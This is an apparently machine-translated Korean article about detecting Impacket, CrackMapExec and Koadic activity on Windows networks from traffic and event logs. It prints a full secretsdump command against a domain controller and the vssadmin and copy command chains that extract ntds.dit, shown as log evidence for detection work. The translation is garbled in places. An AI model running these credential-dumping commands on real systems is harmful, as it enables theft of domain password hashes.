Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰

๊ธฐ์—… ๋ถ€๋ฌธ์˜ ๊ณต๊ฒฉ ๊ฑด์ˆ˜๋Š” ๋งค๋…„ ์ฆ๊ฐ€ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด 2017๋…„์—๋Š” ๊ณ ์œ  ์‚ฌ๊ฑด์ด 13% ๋” ๋งŽ์ด ๊ธฐ๋ก๋˜์—ˆ์Šต๋‹ˆ๋‹ค. 2016๋…„๋ณด๋‹ค, ๊ทธ๋ฆฌ๊ณ  2018๋…„ ๋ง - ์‚ฌ๊ณ  ๋ฐœ์ƒ๋ฅ  27% ์ฆ๊ฐ€์ด์ „ ๊ธฐ๊ฐ„๋ณด๋‹ค. ์ฃผ์š” ์ž‘์—… ๋„๊ตฌ๊ฐ€ Windows ์šด์˜ ์ฒด์ œ์ธ ๋„๊ตฌ๋„ ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. 2017~2018๋…„์—๋Š” APT ๋“œ๋ž˜๊ณคํ”Œ๋ผ์ด, APT28, APT ๋จธ๋””์›Œํ„ฐ ์œ ๋Ÿฝ, ๋ถ๋ฏธ, ์‚ฌ์šฐ๋””์•„๋ผ๋น„์•„์˜ ์ •๋ถ€์™€ ๊ตฐ์‚ฌ ์กฐ์ง์„ ๊ณต๊ฒฉํ–ˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ์œ„ํ•ด ์šฐ๋ฆฌ๋Š” ์„ธ ๊ฐ€์ง€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ–ˆ์Šต๋‹ˆ๋‹ค. ์ž„ํŒจํ‚ท, ํฌ๋ž™๋งต ์‹คํ–‰ ะธ ์ฝ”์•„๋”•. ์†Œ์Šค ์ฝ”๋“œ๋Š” ๊ณต๊ฐœ๋˜์–ด ์žˆ์œผ๋ฉฐ GitHub์—์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด๋Ÿฌํ•œ ๋„๊ตฌ๋Š” ์ดˆ๊ธฐ ์นจํˆฌ์— ์‚ฌ์šฉ๋˜์ง€ ์•Š๊ณ  ์ธํ”„๋ผ ๋‚ด์—์„œ ๊ณต๊ฒฉ์„ ๊ฐœ๋ฐœํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋œ๋‹ค๋Š” ์ ์€ ์ฃผ๋ชฉํ•  ๊ฐ€์น˜๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ๊ฒฝ๊ณ„ ์นจํˆฌ ์ดํ›„ ๋‹ค์–‘ํ•œ ๊ณต๊ฒฉ ๋‹จ๊ณ„์—์„œ ์ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๊ฑด ๊ทธ๋ ‡๊ณ , ์ด๊ฒƒ์€ ๊ฐ์ง€ํ•˜๊ธฐ ์–ด๋ ต๊ณ  ์ข…์ข… ๊ธฐ์ˆ ์˜ ๋„์›€์„ ํ†ตํ•ด์„œ๋งŒ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๋„คํŠธ์›Œํฌ ํŠธ๋ž˜ํ”ฝ์˜ ์†์ƒ ํ”์  ์‹๋ณ„ ๋˜๋Š” ์ด๋ฅผ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜๋Š” ๋„๊ตฌ ๊ณต๊ฒฉ์ž๊ฐ€ ์ธํ”„๋ผ์— ์นจํˆฌํ•œ ํ›„ ๊ณต๊ฒฉ์ž์˜ ํ™œ์„ฑ ํ™œ๋™์„ ํƒ์ง€ํ•ฉ๋‹ˆ๋‹ค.. ์ด ๋„๊ตฌ๋Š” ํŒŒ์ผ ์ „์†ก๋ถ€ํ„ฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์™€์˜ ์ƒํ˜ธ ์ž‘์šฉ ๋ฐ ์›๊ฒฉ ์‹œ์Šคํ…œ์—์„œ ๋ช…๋ น ์‹คํ–‰์— ์ด๋ฅด๊ธฐ๊นŒ์ง€ ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์šฐ๋ฆฌ๋Š” ๋„คํŠธ์›Œํฌ ํ™œ๋™์„ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด ์ด๋Ÿฌํ•œ ๋„๊ตฌ์— ๋Œ€ํ•œ ์—ฐ๊ตฌ๋ฅผ ์ˆ˜ํ–‰ํ–ˆ์Šต๋‹ˆ๋‹ค.

์šฐ๋ฆฌ๊ฐ€ ํ•ด์•ผ ํ•  ์ผ:

  • ํ•ดํ‚น ๋„๊ตฌ์˜ ์ž‘๋™ ๋ฐฉ์‹ ์ดํ•ด. ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์šฉํ•ด์•ผ ํ•  ์‚ฌํ•ญ๊ณผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ์ˆ ์ด ๋ฌด์—‡์ธ์ง€ ์•Œ์•„๋ณด์„ธ์š”.
  • ๊ณต๊ฒฉ ์ดˆ๊ธฐ ๋‹จ๊ณ„์—์„œ ์ •๋ณด ๋ณด์•ˆ ๋„๊ตฌ๋กœ ํƒ์ง€๋˜์ง€ ์•Š์€ ๋‚ด์šฉ์„ ์ฐพ์•„๋ณด์„ธ์š”.. ๊ณต๊ฒฉ์ž๊ฐ€ ๋‚ด๋ถ€ ๊ณต๊ฒฉ์ž์ด๊ฑฐ๋‚˜ ๊ณต๊ฒฉ์ž๊ฐ€ ์ด์ „์— ์•Œ๋ ค์ง€์ง€ ์•Š์•˜๋˜ ์ธํ”„๋ผ์˜ ํ—ˆ์ ์„ ์•…์šฉํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ •์ฐฐ ๋‹จ๊ณ„๋ฅผ ๊ฑด๋„ˆ๋›ธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ์˜ ํ–‰๋™์˜ ์ „์ฒด ์ฒด์ธ์„ ๋ณต์›ํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅํ•ด ์ง€๋ฏ€๋กœ ์ถ”๊ฐ€ ์›€์ง์ž„์„ ๊ฐ์ง€ํ•˜๋ ค๋Š” ์š•๊ตฌ๊ฐ€ ์ƒ๊น๋‹ˆ๋‹ค.
  • ์นจ์ž… ํƒ์ง€ ๋„๊ตฌ์—์„œ ์˜คํƒ์ง€ ์ œ๊ฑฐ. ์ •์ฐฐ๋งŒ์œผ๋กœ ํŠน์ • ๋™์ž‘์ด ๊ฐ์ง€๋˜๋ฉด ๋นˆ๋ฒˆํ•œ ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์žŠ์ง€ ๋ง์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์ธํ”„๋ผ์—๋Š” ์ •๋ณด๋ฅผ ์–ป๊ธฐ ์œ„ํ•œ ์ถฉ๋ถ„ํ•œ ์ˆ˜์˜ ๋ฐฉ๋ฒ•์ด ์žˆ์œผ๋ฉฐ ์–ธ๋œป ๋ณด๋ฉด ํ•ฉ๋ฒ•์ ์ธ ๋ฐฉ๋ฒ•๊ณผ ๊ตฌ๋ณ„ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

์ด๋Ÿฌํ•œ ๋„๊ตฌ๋Š” ๊ณต๊ฒฉ์ž์—๊ฒŒ ๋ฌด์—‡์„ ์ œ๊ณตํ•ฉ๋‹ˆ๊นŒ? ์ด๊ฒƒ์ด Impacket์ด๋ผ๋ฉด ๊ณต๊ฒฉ์ž๋Š” ๊ฒฝ๊ณ„๋ฅผ ๋ฌด๋„ˆ๋œจ๋ฆฐ ํ›„ ์ด์–ด์ง€๋Š” ๊ณต๊ฒฉ์˜ ๋‹ค์–‘ํ•œ ๋‹จ๊ณ„์—์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋Œ€๊ทœ๋ชจ ๋ชจ๋“ˆ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋ฐ›๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. Metasploit๊ณผ ๊ฐ™์€ ๋งŽ์€ ๋„๊ตฌ๋Š” Impacket ๋ชจ๋“ˆ์„ ๋‚ด๋ถ€์ ์œผ๋กœ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์›๊ฒฉ ๋ช…๋ น ์‹คํ–‰์„ ์œ„ํ•œ dcomexec ๋ฐ wmiexec, Impacket์—์„œ ์ถ”๊ฐ€๋œ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ๊ณ„์ •์„ ๊ฐ€์ ธ์˜ค๊ธฐ ์œ„ํ•œ secretsdump๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ฒฐ๊ณผ์ ์œผ๋กœ, ๊ทธ๋Ÿฌํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์˜ ํ™œ๋™์„ ์˜ฌ๋ฐ”๋ฅด๊ฒŒ ๊ฐ์ง€ํ•˜๋ฉด ํŒŒ์ƒ ์ƒํ’ˆ๋„ ๊ฐ์ง€๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ œ์ž‘์ž๊ฐ€ CrackMapExec(๋˜๋Š” ๊ฐ„๋‹จํžˆ CME)์— ๋Œ€ํ•ด "Powered by Impacket"์„ ์“ด ๊ฒƒ์€ ์šฐ์—ฐ์ด ์•„๋‹™๋‹ˆ๋‹ค. ๋˜ํ•œ CME์—๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” ํ•ด์‹œ๋ฅผ ์–ป๊ธฐ ์œ„ํ•œ Mimikatz, ์›๊ฒฉ ์‹คํ–‰์„ ์œ„ํ•œ Meterpreter ๋˜๋Š” Empire ์—์ด์ „ํŠธ ๊ตฌํ˜„, Bloodhound ํƒ‘์žฌ ๋“ฑ ๋„๋ฆฌ ์‚ฌ์šฉ๋˜๋Š” ์‹œ๋‚˜๋ฆฌ์˜ค๋ฅผ ์œ„ํ•œ ๊ธฐ์„ฑ ๊ธฐ๋Šฅ์ด ์žˆ์Šต๋‹ˆ๋‹ค.

์šฐ๋ฆฌ๊ฐ€ ์„ ํƒํ•œ ์„ธ ๋ฒˆ์งธ ๋„๊ตฌ๋Š” Koadic์ด์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ๋งค์šฐ ์ตœ๊ทผ์˜ ๊ฒƒ์œผ๋กœ 25๋…„ ๊ตญ์ œ ํ•ด์ปค ์ปจํผ๋Ÿฐ์Šค DEFCON 2017์—์„œ ๋ฐœํ‘œ๋˜์—ˆ์œผ๋ฉฐ ๋น„ํ‘œ์ค€ ์ ‘๊ทผ ๋ฐฉ์‹์œผ๋กœ ๊ตฌ๋ณ„๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” HTTP, Java Script ๋ฐ Microsoft Visual Basic Script(VBS)๋ฅผ ํ†ตํ•ด ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค. ์ด ์ ‘๊ทผ ๋ฐฉ์‹์„ Living off the land๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ์ด ๋„๊ตฌ๋Š” Windows์— ๋‚ด์žฅ๋œ ์ข…์†์„ฑ ๋ฐ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ์„ธํŠธ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ œ์ž‘์ž๋Š” ์ด๋ฅผ COM Command & Control ๋˜๋Š” C3์ด๋ผ๊ณ  ๋ถ€๋ฆ…๋‹ˆ๋‹ค.

์ถฉ๊ฒฉ

Impacket์˜ ๊ธฐ๋Šฅ์€ AD ๋‚ด๋ถ€ ์ •์ฐฐ, ๋‚ด๋ถ€ MS SQL ์„œ๋ฒ„์—์„œ ๋ฐ์ดํ„ฐ ์ˆ˜์ง‘, ์ž๊ฒฉ ์ฆ๋ช… ํš๋“ ๊ธฐ์ˆ (SMB ๋ฆด๋ ˆ์ด ๊ณต๊ฒฉ, ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ์—์„œ ์‚ฌ์šฉ์ž ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ๊ฐ€ ํฌํ•จ๋œ ntds.dit ํŒŒ์ผ ํš๋“)์— ์ด๋ฅด๊ธฐ๊นŒ์ง€ ๋งค์šฐ ๊ด‘๋ฒ”์œ„ํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ Impacket์€ WMI, Windows ์Šค์ผ€์ค„๋Ÿฌ ๊ด€๋ฆฌ ์„œ๋น„์Šค, DCOM ๋ฐ SMB์˜ ๋„ค ๊ฐ€์ง€ ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ ์›๊ฒฉ์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋ฉฐ ์ด๋ฅผ ์œ„ํ•ด์„œ๋Š” ์ž๊ฒฉ ์ฆ๋ช…์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

๋น„๋ฐ€ ๋คํ”„

secretsdump๋ฅผ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์‚ฌ์šฉ์ž ์ปดํ“จํ„ฐ์™€ ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ๋ฅผ ๋ชจ๋‘ ๋Œ€์ƒ์œผ๋กœ ํ•  ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ˆ์ž…๋‹ˆ๋‹ค. LSA, SAM, SECURITY, NTDS.dit ๋ฉ”๋ชจ๋ฆฌ ์˜์—ญ์˜ ๋ณต์‚ฌ๋ณธ์„ ์–ป๋Š” ๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ๊ณต๊ฒฉ์˜ ๋‹ค์–‘ํ•œ ๋‹จ๊ณ„์—์„œ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ชจ๋“ˆ ์ž‘์—…์˜ ์ฒซ ๋ฒˆ์งธ ๋‹จ๊ณ„๋Š” SMB๋ฅผ ํ†ตํ•œ ์ธ์ฆ์œผ๋กœ, Pass the Hash ๊ณต๊ฒฉ์„ ์ž๋™์œผ๋กœ ์ˆ˜ํ–‰ํ•˜๋ ค๋ฉด ์‚ฌ์šฉ์ž์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋‚˜ ํ•ด์‹œ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๋‹ค์Œ์œผ๋กœ SCM(์„œ๋น„์Šค ์ œ์–ด ๊ด€๋ฆฌ์ž)์— ๋Œ€ํ•œ ์•ก์„ธ์Šค๋ฅผ ์—ด๊ณ  winreg ํ”„๋กœํ† ์ฝœ์„ ํ†ตํ•ด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์•ก์„ธ์Šคํ•˜๋ผ๋Š” ์š”์ฒญ์ด ๋‚˜์˜ต๋‹ˆ๋‹ค. ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์ž๋Š” ๊ด€์‹ฌ ์žˆ๋Š” ๋ถ„๊ธฐ์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ฐพ๊ณ  SMB๋ฅผ ํ†ตํ•ด ๊ฒฐ๊ณผ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ทธ๋ฆผ์—์„œ. 1์—์„œ๋Š” winreg ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•  ๋•Œ LSA๊ฐ€ ์žˆ๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•ก์„ธ์Šคํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์ •ํ™•ํžˆ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค. ์ด๋ ‡๊ฒŒ ํ•˜๋ ค๋ฉด opcode 15 - OpenKey์™€ ํ•จ๊ป˜ DCERPC ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 1. winreg ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค ์—ด๊ธฐ

๋‹ค์Œ์œผ๋กœ ํ‚ค์— ๋Œ€ํ•œ ์•ก์„ธ์Šค๊ฐ€ ํš๋“๋˜๋ฉด Opcode 20๊ณผ ํ•จ๊ป˜ SaveKey ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ฐ’์ด ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. Impacket์€ ์ด๋ฅผ ๋งค์šฐ ๊ตฌ์ฒด์ ์ธ ๋ฐฉ์‹์œผ๋กœ ์ˆ˜ํ–‰ํ•ฉ๋‹ˆ๋‹ค. .tmp๊ฐ€ ์ถ”๊ฐ€๋œ ์ž„์˜์˜ 8๊ฐœ ๋ฌธ์ž๋กœ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด ์ด๋ฆ„์„ ๊ฐ€์ง„ ํŒŒ์ผ์— ๊ฐ’์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ ์ด ํŒŒ์ผ์€ System32 ๋””๋ ‰ํ„ฐ๋ฆฌ์—์„œ SMB๋ฅผ ํ†ตํ•ด ์ถ”๊ฐ€๋กœ ์—…๋กœ๋“œ๋ฉ๋‹ˆ๋‹ค(๊ทธ๋ฆผ 2).

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 2. ์›๊ฒฉ ์‹œ์Šคํ…œ์—์„œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ฅผ ์–ป๋Š” ๋ฐฉ๋ฒ•

๋„คํŠธ์›Œํฌ์—์„œ์˜ ์ด๋Ÿฌํ•œ ํ™œ๋™์€ winreg ํ”„๋กœํ† ์ฝœ, ํŠน์ • ์ด๋ฆ„, ๋ช…๋ น ๋ฐ ์ˆœ์„œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํŠน์ • ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๋ถ„๊ธฐ์— ๋Œ€ํ•œ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•ด ๊ฐ์ง€ํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒƒ์œผ๋กœ ๋‚˜ํƒ€๋‚ฌ์Šต๋‹ˆ๋‹ค.

๋˜ํ•œ ์ด ๋ชจ๋“ˆ์€ Windows ์ด๋ฒคํŠธ ๋กœ๊ทธ์— ์ถ”์ ์„ ๋‚จ๊ธฐ๋ฏ€๋กœ ์‰ฝ๊ฒŒ ๊ฐ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ๋ช…๋ น์„ ์‹คํ–‰ํ•œ ๊ฒฐ๊ณผ

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 ๋กœ๊ทธ์—๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์ฃผ์š” ์ด๋ฒคํŠธ ์ˆœ์„œ๊ฐ€ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค.

1. 4624 - ์›๊ฒฉ ๋กœ๊ทธ์˜จ.
2. 5145 - winreg ์›๊ฒฉ ์„œ๋น„์Šค์— ๋Œ€ํ•œ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.
3. 5145 - System32 ๋””๋ ‰ํ„ฐ๋ฆฌ์—์„œ ํŒŒ์ผ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค. ํŒŒ์ผ์—๋Š” ์œ„์—์„œ ์–ธ๊ธ‰ํ•œ ์ž„์˜์˜ ์ด๋ฆ„์ด ์žˆ์Šต๋‹ˆ๋‹ค.
4. 4688 - vssadmin์„ ์‹œ์ž‘ํ•˜๋Š” cmd.exe ํ”„๋กœ์„ธ์Šค ์ƒ์„ฑ:

โ€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

์Šค์— ๋ฒก์„น

๋งŽ์€ ๊ณต๊ฒฉ ํ›„ ๋„๊ตฌ์™€ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ Impacket์—๋Š” ๋ช…๋ น์„ ์›๊ฒฉ์œผ๋กœ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ๋ชจ๋“ˆ์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์›๊ฒฉ ์‹œ์Šคํ…œ์—์„œ ๋Œ€ํ™”ํ˜• ๋ช…๋ น ์…ธ์„ ์ œ๊ณตํ•˜๋Š” smbexec์— ์ค‘์ ์„ ๋‘˜ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ๋ชจ๋“ˆ์—๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ๋˜๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SMB๋ฅผ ํ†ตํ•œ ์ธ์ฆ๋„ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋ฆผ์—์„œ. ๊ทธ๋ฆผ 3์—์„œ๋Š” ์ด๋Ÿฌํ•œ ๋„๊ตฌ์˜ ์ž‘๋™ ๋ฐฉ์‹์— ๋Œ€ํ•œ ์˜ˆ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ฒฝ์šฐ์—๋Š” ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ์ฝ˜์†”์ž…๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 3. ๋Œ€ํ™”ํ˜• smbexec ์ฝ˜์†”

์ธ์ฆ ํ›„ smbexec์˜ ์ฒซ ๋ฒˆ์งธ ๋‹จ๊ณ„๋Š” OpenSCManagerW ๋ช…๋ น(15)์„ ์‚ฌ์šฉํ•˜์—ฌ SCM์„ ์—ฌ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ฟผ๋ฆฌ๋Š” ์ฃผ๋ชฉํ•  ๋งŒํ•ฉ๋‹ˆ๋‹ค. MachineName ํ•„๋“œ๋Š” DUMMY์ž…๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 4. ์„œ๋น„์Šค ์ œ์–ด ๊ด€๋ฆฌ์ž ์—ด๊ธฐ ์š”์ฒญ

๋‹ค์Œ์œผ๋กœ CreateServiceW ๋ช…๋ น(12)์„ ์‚ฌ์šฉํ•˜์—ฌ ์„œ๋น„์Šค๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. smbexec์˜ ๊ฒฝ์šฐ ๋งค๋ฒˆ ๋™์ผํ•œ ๋ช…๋ น ๊ตฌ์„ฑ ๋…ผ๋ฆฌ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋ฆผ์—์„œ. 5 ๋…น์ƒ‰์€ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์—†๋Š” ๋ช…๋ น ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ๋‚˜ํƒ€๋‚ด๊ณ  ๋…ธ๋ž€์ƒ‰์€ ๊ณต๊ฒฉ์ž๊ฐ€ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ํ•ญ๋ชฉ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์‹คํ–‰ ํŒŒ์ผ์˜ ์ด๋ฆ„, ํ•ด๋‹น ๋””๋ ‰ํ„ฐ๋ฆฌ ๋ฐ ์ถœ๋ ฅ ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ๊ฒƒ์€ ์‰ฝ๊ฒŒ ์•Œ ์ˆ˜ ์žˆ์ง€๋งŒ Impacket ๋ชจ๋“ˆ์˜ ๋…ผ๋ฆฌ๋ฅผ ๋ฐฉํ•ดํ•˜์ง€ ์•Š๊ณ  ๋‚˜๋จธ์ง€๋Š” ๋ณ€๊ฒฝํ•˜๊ธฐ๊ฐ€ ํ›จ์”ฌ ์–ด๋ ต์Šต๋‹ˆ๋‹ค.

Windows ์ธํ”„๋ผ์— ๋Œ€ํ•œ ๊ณต๊ฒฉ์„ ํƒ์ง€ํ•˜๋Š” ๋ฐฉ๋ฒ•: ํ•ด์ปค ๋„๊ตฌ ํƒ์ƒ‰
์Œ€. 5. Service Control Manager๋ฅผ ์ด์šฉํ•˜์—ฌ ์„œ๋น„์Šค ์ƒ์„ฑ ์š”์ฒญ

Smbexec์€ ๋˜ํ•œ Windows ์ด๋ฒคํŠธ ๋กœ๊ทธ์— ๋ช…๋ฐฑํ•œ ํ”์ ์„ ๋‚จ๊น๋‹ˆ๋‹ค. ipconfig ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€ํ™”ํ˜• ๋ช…๋ น ์…ธ์— ๋Œ€ํ•œ Windows Server 2016 ๋กœ๊ทธ์—๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์ฃผ์š” ์ด๋ฒคํŠธ ์‹œํ€€์Šค๊ฐ€ โ€‹โ€‹ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค.

1. 4697 โ€” ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ์„œ๋น„์Šค ์„ค์น˜:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

